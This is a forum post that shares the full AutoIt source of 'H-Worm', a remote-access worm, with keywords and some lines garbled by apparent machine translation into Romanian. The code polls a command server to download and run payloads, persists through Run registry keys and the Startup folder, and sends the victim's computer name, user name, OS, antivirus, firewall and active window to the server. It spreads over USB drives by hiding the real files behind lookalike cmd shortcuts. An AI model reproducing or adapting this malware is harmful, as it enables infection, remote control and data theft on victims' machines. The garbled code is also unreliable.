H-Worm [AutoIt]

io.kent · June 28, 2013

Cod (AutoIt):
# Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
H-WORM ÎN LUME (AutoIt versiune) \
= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

CODER:
Houdini (C) - WWW.DEV-POINT.COM

Limbaj compilat:
AutoIt V 3.0

VIZITA OWR mai multe informa?ii sau Contacta?i-m? în:
SKYPE: Houdini-FX

# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

# Include <PROCESS.AU3>
# Include <WINAPI.AU3>
# Include <FILE.AU3>
# NOTRAYICON

# CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
CONFIG WORM
# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

LOCAL $ IP_ADDR = "127.0.0.1"
LOCAL $ port = "40055"
LOCAL $ install_dir = @ TEMPDIR


# CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
VARIABLE WORM
# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

LOCAL $ CIMV2 = OBJGET ("WINMGMTS:!. {IMPERSONATIONLEVEL = juca rolul} \ \ \ ROOT \ CIMV2")
LOCAL $ SPLITTER = "<|>"
LOCAL $ WORM_VERSION = "H-WORM (AutoIt)"
LOCAL $ USB_SPREADING = "false"
LOCAL $ SERVER_CMD
LOCAL $ W_METUX
LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT


# CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
COD WORM: START
# CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

DAC? NU @ COMPILATA EXIT ATUNCI
__INIT ()
While True
__USB_SPREADING ()
__STARTUP ()
$ SERVER_CMD = __ POST ("I_AM_READY")
$ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ separator, 1)
SELECT
CASE $ SERVER_CMD [1] = "Uninstall"
CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
__USB_SPREADING ($ SERVER_CMD [1])
REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME)
REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME)
FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
EXIT
CASE $ SERVER_CMD [1] = "UPDATE"
CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
_WINAPI_CLOSEHANDLE ($ W_METUX)
__DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
EXIT
CASE $ SERVER_CMD [1] = "Trimite"
CONSOLEWRITE ("TRIMITE" & $ SERVER_CMD [2] & @ CRLF)
__DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
CASE $ SERVER_CMD [1] = "EXCECUTE"
CONSOLEWRITE ("EXCECUTE" & SERVER_CMD $ [2] & @ CRLF)
__RUNA3X ($ SERVER_CMD [2])
ENDSELECT
SLEEP (5000)
Merge încet


FUNC __ init ()

_PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ install_dir & "\" & @ SCRIPTNAME)) ATUNCI
If ($ linie_cmd [0]> 0) ?i ($ linie_cmd [1] = "/ UPDATE") ATUNCI
DO
PANA FILECOPY (@ SCRIPTFULLPATH, $ install_dir & "\" & @ SCRIPTNAME, 1 +8) = 1
ELSE
FILECOPY (@ SCRIPTFULLPATH, $ install_dir & "\" & @ SCRIPTNAME, 1 +8)
ENDIF
ShellExecute ($ install_dir & "\" & @ SCRIPTNAME)
EXIT
ENDIF
__ONE_INSTANCE ()
__IS_USB_SPREADING ()
ENDFUNC



FUNC __ DAWONLOAD_AND_EXEC ($ file, $ RUN = TRUE, $ CMD = "")

LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
LOCAL $ FGET_HANDEL

_PATHSPLIT ($ File, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
$ Rezultat = __ POST ("IS-TRIMITERE" & $ Splitter & $ file, "stream")
$ FGET_HANDEL = FileOpen (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT, 16 +2 +8)
FILEWRITE ($ FGET_HANDEL, $ rezultat)
FILECLOSE ($ FGET_HANDEL)
Daca $ apoi executa?i ShellExecute (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT, $ CMD)
RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & SZFNAME $ & $ SZEXT
ENDFUNC




FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")

LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
LOCAL $ FGET_HANDEL

_PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
$ A3X_DATA = __ POST ("IS-TRIMITERE" & $ Splitter & $ A3X_FILE, "stream")
$ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3x [" & BINARYLEN ($ A3X_DATA) ?i "]")
DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3x", $ A3X_DATA)

$ H_RESOURCE = DLLCALL
Daca $ H_RESOURCE [0] <> 0 atunci
DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
DLLCALL ("Kernel32.dll", "bool", "EndUpdateResource", "descurca", $ H_RESOURCE [0], "bool", FALSE)
ShellExecute (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
ENDIF
ENDFUNC




FUNC POST __ ($ data, $ type = "text")

LOCAL $ rezultat

HTTPSETUSERAGENT (__INFORMATIOM ())
$ Rezultat = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATE, 1)
Daca $ type = "text" returna STRINGUPPER (BINARYTOSTRING ($ rezultat))
RETURN $ rezultat
ENDFUNC


FUNC STARTUP __ ()

REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME, "REG_SZ", CHR (34) & $ install_dir & "\" & @ SCRIPTNAME & CHR (34))
REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", $ WZFNAME, "REG_SZ", CHR (34) & $ install_dir & "\" & @ SCRIPTNAME & CHR (34))
FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
ENDFUNC


FUNC __ INFORMATIOM ()

LOCAL $ inforamtion = ""

$ Inforamtion = $ inforamtion & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
$ Inforamtion = $ inforamtion & @ ComputerName & $ SPLITTER
$ Inforamtion = $ inforamtion & nume de utilizator @ & $ SPLITTER
$ Inforamtion = $ inforamtion & OPERATING_SYSTEM () __ & $ SPLITTER
$ Inforamtion = $ inforamtion & $ WORM_VERSION & $ SPLITTER
$ Inforamtion = $ inforamtion & SECURITY_CENTER () __ & $ SPLITTER
$ Inforamtion = $ inforamtion & $ USB_SPREADING & $ SPLITTER
$ Inforamtion = $ inforamtion & __ TOP_WINDOWS ()
Întoarcere $ inforamtion

ENDFUNC






FUNC __ OPERATING_SYSTEM ()

LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
LOCAL $ OS_CAPTION = ""

Pentru $ operare în $ OPERATINGSYSTEM
$ OS_CAPTION = $ OS.CAPTION & "."
EXITLOOP
NEXT
Întoarcere $ OS_CAPTION
ENDFUNC






FUNC __ SECURITY_CENTER ()


LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
LOCAL $ OS_VERSION
LOCAL $ SECURITY_CENTER = "SecurityCenter"

Pentru $ operare în $ OPERATINGSYSTEM
$ OS_VERSION = NUM?RUL ($ OS.VERSION)
NEXT
Daca $ OS_VERSION> 6 atunci $ SECURITY_CENTER = "SECURITYCENTER2"
$ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS:. \ \ \ ROOT \" & $ SECURITY_CENTER)

LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
LOCAL $ ANTI_VIRUSE = ""
LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
LOCAL $ FIRE_WALL = ""

Pentru $ OBJ_ANTI_VIRUS în $ COL_ANTI_VIRUS
$ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME si "."
NEXT

Pentru $ OBJ_FIRE_WALL în $ COL_FIRE_WALL
$ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME si "."
NEXT

Daca $ ANTI_VIRUSE = "" atunci $ ANTI_VIRUSE = "NU AV"
Daca $ FIRE_WALL = "" atunci $ FIRE_WALL = "NO FW"

Întoarcere $ ANTI_VIRUSE & "<|>" & FIRE_WALL $
ENDFUNC





FUNC __ TOP_WINDOWS ()

LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
LOCAL $ WINTOP_PID, $ WINTOP_PNAME
_WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
$ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)

Întoarcere $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME si "]"
ENDFUNC





FUNC __ ONE_INSTANCE ()

$ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME si "_" & $ WORM_VERSION)
IF (@ EROARE) sau (_WINAPI_GETLASTERROR () = 183) apoi ie?i?i
ENDFUNC



FUNC __ USB_SPREADING ($ type = "Instalare")

$ DISK = DRIVEGETDRIVE ("Removable")
DAC? NU ISARRAY ($ disc) apoi s? se întoarc?
Pentru $ I = 1 la $ DISK [0] PASUL 1
IF DRIVESTATUS ($ DISK [$ i]) = "READY", atunci IFOLDERS __ ($ DISK [$ i] & "\", $ TIP)
NEXT

ENDFUNC



FUNC IS_USB_SPREADING __ ()

LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
$ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
Daca $ USB_SPREADING = "", apoi
$ USB_SPREADING = "false"
IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) atunci $ USB_SPREADING = "true"
REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
ENDIF
ENDFUNC



IFOLDERS __ func ($ ROOT, $ type = "Install", $ nume = TRUE, $ CALLBACK = "__CALLBACK")

LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0

$ ENUM_ARRAY [0] = $ ROOT
DO
$ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
DO
$ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
DAC? NU @ eroare ?i $ FIND_NAME <> "", apoi
ReDim $ ENUM_ARRAY [UBound ($ ENUM_ARRAY) +1]
$ ENUM_ARRAY [UBound ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
CALL ($ apel invers, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TIP)
$ L_COUNTER + = 1
ENDIF
PÂN? @ eroare sau $ FIND_NAME = ""
FILECLOSE ($ H_SEARCH)
Dac? primele $ = TRUE ?i $ G_COUNTER = 0 atunci EXITLOOP
$ G_COUNTER + = 1
PÂN? LA $ G_COUNTER> $ L_COUNTER
Întoarcere $ ENUM_ARRAY
ENDFUNC


FUNC CALLBACK __ ($ PATH, $ TIP)

LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ argumente
_PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)

Daca $ type = "Install", apoi
IF (STRINGUPPER ($ SZEXT) = ". LNK") sau (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) apoi s? se întoarc?
FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
FILESETATTRIB ($ SZDRIVE & $ SZDIR & SCRIPTNAME @, "+ HS")
$ Argumente = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& Start" si STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
DAC? NU STRINGINSTR (FILEGETATTRIB ($ PATH), "D"), atunci
$ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \" & $ SZEXT, "") & "\ DEFAULTICON", "")
ELSE
$ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \ de \ DEFAULTICON", "")
ENDIF
$ SZICON = STRINGSPLIT ($ SZICON, "")
If ($ SZICON [0] = 1) ?i (STRINGINSTR ($ SZICON [1], "% 1") = 0), apoi FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente , "", $ SZICON [1], "", "", @ SW_HIDE)
If ($ SZICON [0] = 1) ?i (STRINGINSTR ($ SZICON [1], "% 1")> 0) ATUNCI FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente , "", $ PATH, "", "", @ SW_HIDE)
If ($ SZICON [0] = 2) ATUNCI FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ argumente, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
FILESETATTRIB ($ PATH, "+ HS")
ENDIF
Daca $ type = "Uninstall" ATUNCI
IF (STRINGUPPER ($ SZEXT) = ". LNK") sau (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) ATUNCI FILEDELETE ($ PATH)
FILESETATTRIB ($ PATH, "-SA")
ENDIF

ENDFUNC


FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)

LOCAL $ RET = DLLCALL ('Kernel32.dll "," PTR "," CreateMutexW "," PTR ", DLLSTRUCTGETPTR ($ TSECURITY)," INT ", $ FINITIAL," WSTR ", $ SMUTEX)
IF (@ ERORI) SAU (NU $ RET [0]) ATUNCI
RETURN SetError (1, 0, 0)
ENDIF
Întoarcere $ RET [0]
ENDFUNC

Sign In

H-Worm [AutoIt]

Recommended Posts

io.kent

Join the conversation

Browse

Activity

Pages